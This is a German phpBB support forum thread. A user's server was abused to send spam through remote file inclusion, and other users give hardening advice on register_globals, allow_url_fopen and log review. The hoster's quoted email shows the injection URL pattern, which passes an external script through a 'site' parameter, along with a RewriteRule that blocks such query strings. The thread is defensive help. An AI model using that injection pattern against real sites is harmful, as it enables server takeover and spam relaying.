Spammen über PHPBB - index.php (v 2.0.21)

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
Slayerwarp
Mitglied
Beiträge: 26
Registriert: 16.12.2002 17:43

Spammen über PHPBB - index.php (v 2.0.21)

Beitrag von Slayerwarp »

hallo,

ich durfte mich heute über folgende mail von meinem Hoster erfreuen:

Hallo Herr *****

soeben wurden Spammails von Ihrem Account aus verschickt, dies erfolgte durch die Übergabe eines externen Scriptes an Ihre index.php

http://www.*****.***/main.php?site=http://www.geocities.com/<spam-dir>/<Spam-txt>


Um erneuten Spam zu vermeiden wurde in Ihrem Startverzeichnis die .htaccess um folgendes erweitert, das die Übergeben von externen Links an sämtliche Dateien verhindert:


RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC]
RewriteRule ^(.*) - [F]


Mit freundlichen Grüßen

wenn ein Entwickler den ganzen Pfad braucht, bitte um eine PM, da ich ja nicht will dass ich eine aufs Dach bekomme, weil ich spam urls poste *g*
(das spammerfile hab ich mir auch geladen, falls es zwischenzeitlich verschwinden sollte, komischerweise lag das in plaintext auf....)

Nun wie geschrieben hab ich schon auf die v 2.0.21 upgedatet, das admin Verzeichnis auch mit einer Passwort - .htaccess vermint, und die install-dirs gibts auch nimmer.

Nun bis auf das mit den zusatzeinträgen weiß ich nicht was ich am Forum machen soll damit sowas nimmer vor kommt.

lg Martin
Benutzeravatar
cYbercOsmOnauT
Ehemaliges Teammitglied
Beiträge: 3820
Registriert: 18.02.2004 23:02
Wohnort: Göttingen
Kontaktdaten:

Beitrag von cYbercOsmOnauT »

Hallo Martin,

erst einmal möchte ich etwas klarstellen:

Deine Attacke ging nicht über die index.php vom phpBB, sondern von irgendeiner main.php von irgendeinem Mod den Du scheinbar eingebaut hast. Denn auch die Variable 'site' ist kein Bestandteil der index.php von phpBB.

Das was Du erlebt hast kennt man unter den Namen 'Remote Code Injection'. Solche Attacken funktionieren nur, wenn register_globals aktiv ist. Frag Deinen Hoster mal lieber, wie Du dies abstellen kannst.

Viele Grüße,
Tekin

P.S.: Der Ansatz Deines Hosters ist auch sehr interessant und nützlich für Leute, die nicht per .htaccess einfach die globals abstellen können. Ich werde ihn mir merken.
• prof. phpbb-Installation, Reparatur, Rettung nach Hackattacken, sowie PHP/JS Programmierung aller Art
Zend Certified Engineer, Linux Administrator und die Sicherheit von 34 Jahren Programmiererfahrung
• Interesse? Kontakt unter t.birduezen@web-coding.eu
Slayerwarp
Mitglied
Beiträge: 26
Registriert: 16.12.2002 17:43

Beitrag von Slayerwarp »

naja, ich hab meinen foren Ordner durchsucht (den ich als Backup kopiert habe) und 0 ergebnisse auf eine main.php bekommen (natürlich rekursiv gesucht)
auch in dem File: index.php hab ich den String: main.php nicht gefunden..

Das wird jetz doch misteriös...

Das die Mail von meinem Hoster kein Fake ist haben die 6500 Spam-Bounces / Mail Delayed in meinem Mailprogramm bestätigt...
Benutzeravatar
cYbercOsmOnauT
Ehemaliges Teammitglied
Beiträge: 3820
Registriert: 18.02.2004 23:02
Wohnort: Göttingen
Kontaktdaten:

Beitrag von cYbercOsmOnauT »

Dann haben die wohl ein anderes Script ausgenutzt. Die Accesslogs zeigen ja auch Zugriffe auf Scripte, die auf Deiner Domain nicht existieren, aber der Angreifer versucht hat anzusprechen. Such mal weiter in Deinen Accesslogs nach der echten Attacke.
• prof. phpbb-Installation, Reparatur, Rettung nach Hackattacken, sowie PHP/JS Programmierung aller Art
Zend Certified Engineer, Linux Administrator und die Sicherheit von 34 Jahren Programmiererfahrung
• Interesse? Kontakt unter t.birduezen@web-coding.eu
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:

Beitrag von larsneo »

ich durfte mich heute über folgende mail von meinem Hoster erfreuen:
[...]
mich amüsiert (besser gesagt verwundert) eher der lösungansatz des providers, der anstatt das problem zu beheben eine (von vielen) injection-möglichkeiten versucht zu beheben (anstatt z.b. restriktiv allow_url_fopen auf 'off' bzw. suhosin einzusetzen).

fakt scheint auf jeden fall zu sein, dass du einen spamzombie hast - und da sollte man schnellstens analysieren, wo das eigentliche problem liegt - mit anderen worten: logs (sowohl access als auch error) komplett auswerten und ggfs. noch einmal mit dem provider sprechen was er für anhaltspunkte hat.

btw: register_globals ist hoffentlich wenigstens auf 'off' gesetzt, oder?
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Benutzeravatar
cYbercOsmOnauT
Ehemaliges Teammitglied
Beiträge: 3820
Registriert: 18.02.2004 23:02
Wohnort: Göttingen
Kontaktdaten:

Beitrag von cYbercOsmOnauT »

larsneo hat geschrieben:btw: register_globals ist hoffentlich wenigstens auf 'off' gesetzt, oder?
Beim Angriff selber wie es scheint nicht.. vielleicht hat er es ja jetzt getan.

Falls nicht, hier eine kurze Anleitung. Folgende Zeile in die .htaccess im Domain Root reinschreiben:

Code: Alles auswählen

php_flag register_globals off
Sollte Dein Server das nicht zulassen, wirst Du ab dann nur noch HTTP 500 sehen. Dann musst Du diese Zeile wieder entfernen und umgehend mit Deinem Hoster telefonieren, damit die es von sich aus abstellen.
• prof. phpbb-Installation, Reparatur, Rettung nach Hackattacken, sowie PHP/JS Programmierung aller Art
Zend Certified Engineer, Linux Administrator und die Sicherheit von 34 Jahren Programmiererfahrung
• Interesse? Kontakt unter t.birduezen@web-coding.eu
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“